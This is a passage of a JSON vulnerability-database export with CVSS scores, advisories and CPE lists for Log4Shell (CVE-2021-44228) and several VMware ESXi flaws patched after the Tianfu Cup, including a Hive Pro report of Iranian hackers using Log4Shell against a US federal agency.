"NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T04:18:00", "type": "thn", "title": "Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T05:29:48", "id": "THN:AFF2BD38CB9578D0F4CA96A145933627", "href": "https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-02-25T21:37:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here VMware addressed vulnerabilities in ESXi, Workstation, Fusion, and Cloud Foundation, few months after the discovery of these bugs by participants at Tianfu Cup Pwn Contest. VMware has rated some of these vulnerabilities as important, however, chaining these issues together may result in what is effectively a critical exploit. Successfully exploiting VMware Workstation might allow attackers to perform guest-to-host escape and when combined with ESXi exploitation, it may allow them to execute code as the virtual machine's VMX process and obtain root permissions on the host machine. A Use-after-free vulnerability in XHCI USB controller (CVE-2021-22040) and a double-fetch vulnerability in UHCI USB controller (CVE-2021-22041) were reported. Attackers with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host if isochronous USB endpoint is available. Other noted vulnerability was ESXi settingsd unauthorized access (CVE-2021-22042) which allows an attacker with privileges within the VMX process only to access settingsd service running as a high privileged user. In addition to these bugs, an ESXi settingsd TOCTOU vulnerability (CVE-2021-22043) also allows an attacker with access to settingsd to escalate their privileges by writing arbitrary files. Organizations should apply all the patches as given below. VMware has also included workarounds in their advisories, suggesting customers that removing USB controllers from virtual machines may help resolve these issues. Potential MITRE ATT&CK TTPs are: TA0001: Initial Access TA0040: Impact TA0007: Discovery TA0004: Privilege Escalation TA0005: Defense Evasion T1068: Exploitation for Privilege Escalation T1497: Virtualization/Sandbox Evasion T1195: Supply Chain Compromise T1499: Endpoint Denial of Service T1499.001: Endpoint Denial of Service: Service Exhaustion Flood Vulnerability Details Patch Link https://www.vmware.com/security/advisories/VMSA-2022-0004.html References https://www.securityweek.com/vmware-patches-vulnerabilities-reported-researchers-chinese-government https://www.zdnet.com/article/vmware-patches-released-after-vulnerabilities-found-during-tianfu-cup/", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T13:43:03", "type": "hivepro", "title": "VMware addresses security flaws discovered during Tianfu Cup Pwn Contest", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043"], "modified": "2022-02-16T13:43:03", "id": "HIVEPRO:28461231008E2CD9C4C856AF402D282D", "href": "https://www.hivepro.com/vmware-addresses-security-flaws-discovered-during-tianfu-cup-pwn-contest/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-17T15:39:19", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Iranian APT activity was detected on the networks of federal agencies. The intruders utilized an exploit targeting Log4Shell (CVE-2021-44228) to install XMRig crypto mining software on an unpatched VMware Horizon server. Due to the similarity in the tools used and attack chain hive pro threat research team has linked it to the Iranian state-sponsored actor Fox Kitten", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-17T12:28:57", "type": "hivepro", "title": "Iranian hackers leveraged Log4Shell to penetrate US federal agency", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-17T12:28:57", "id": "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "href": "https://www.hivepro.com/iranian-hackers-leveraged-log4shell-to-penetrate-us-federal-agency/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-03T14:37:01", "description": "ESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. A malicious actor with network access to ESXi may exploit this issue to create a denial-of-service condition by overwhelming rhttpproxy service with multiple requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22050", "cwe": ["CWE-770"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22050"], "modified": "2022-02-25T17:57:00", "cpe": ["cpe:/o:vmware:esxi:7.0", "cpe:/o:vmware:esxi:6.5", "cpe:/o:vmware:esxi:6.7"], "id": "CVE-2021-22050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22050", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201908211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201911001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004408:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201906002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202008001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202103001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:36:59", "description": "VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. A malicious actor with privileges within the VMX process only, may be able to access settingsd service running as a high privileged user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22042", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22042"], "modified": "2022-02-25T18:07:00", "cpe": ["cpe:/o:vmware:esxi:7.0"], "id": "CVE-2021-22042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22042", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:7.0:update_2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:36:56", "description": "VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22040", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040"], "modified": "2022-02-24T19:43:00", "cpe": ["cpe:/o:vmware:esxi:7.0", "cpe:/o:vmware:esxi:6.5", "cpe:/o:vmware:esxi:6.7"], "id": "CVE-2021-22040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22040", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201908211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201911001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004408:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202111101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213-ug:*:*:*:*:*:*", 